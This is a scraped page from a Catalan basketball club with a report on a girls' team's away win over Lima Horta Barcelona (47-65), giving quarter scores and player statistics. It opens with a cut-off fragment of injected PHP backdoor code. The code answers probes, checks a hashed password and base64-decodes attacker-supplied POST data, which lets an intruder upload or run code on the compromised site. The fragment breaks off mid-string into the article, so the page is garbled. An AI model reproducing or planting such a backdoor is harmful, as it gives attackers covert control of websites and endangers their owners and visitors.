function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Segona victòria de l'any! -

Segona victòria de l’any!

Updated: octubre 11, 2022

Segona victòria de l’any de l’Infantil femení 09B a domicili, contra Lima Horta Barcelona (47-65). Partit en què el TGN va estar molt bé en defensa, aconseguint moltes cistelles fàcils i robatoris en la pressió a tota pista. També va estar molt bé l’equip Lila en els 1×1, aconseguint desfer-se de la defensa rival i finalitzant moltes vegades abans que arribessin les ajudes de l’equip rival. Va ser un partit amb poc tir i menys encert exterior. El TGN va anar moltes vegades a la línia de tirs lliures, però en aquest matx no va estar massa encertat… El partit que al descans semblava plàcid, amb el control en defensa s’havia posat  22 punts a favor del conjunt tarragoní, no va ser tan còmode en la segona part, que el conjunt barceloní va reaccionar i va estar més encertat ofensivament. Tot i així, malgrat que el TGN no va mostrar la mateixa solidesa en defensa, va poder sumar el segon triomf oficial del curs 22/23 a una pista sempre complicada.

LIMA HORTA BARCELONA: 47 – TGN BÀSQUET 09B: 65
PARCIALS: 6-20, 15-23, 10-07, 16-15

LIMA HORTA BARCELONA: Funes (4), Esteve (4), Carmona (6), Bachs (2), Serrano (2) —cinc inicial— Ramon (10), Ortega (0), Hal (2), Carreras (11), Martin (6) i Molano (0).
LES XIFRES DEL PARTIT: 0 triples, 1/12 tirs lliures. 25 faltes. Eliminada: Molano (min 31)

TGN BÀSQUET 09B: Montell (6), Sabate (3), Diez (10), Prades (13), Sala (4) —cinc inicial—Fernández (3), Gandía (3), Meroño (18) i Carayol (5).
LES XIFRES DEL PARTIT:  0 triples, 9/30 tirs lliures. 15 faltes. Eliminada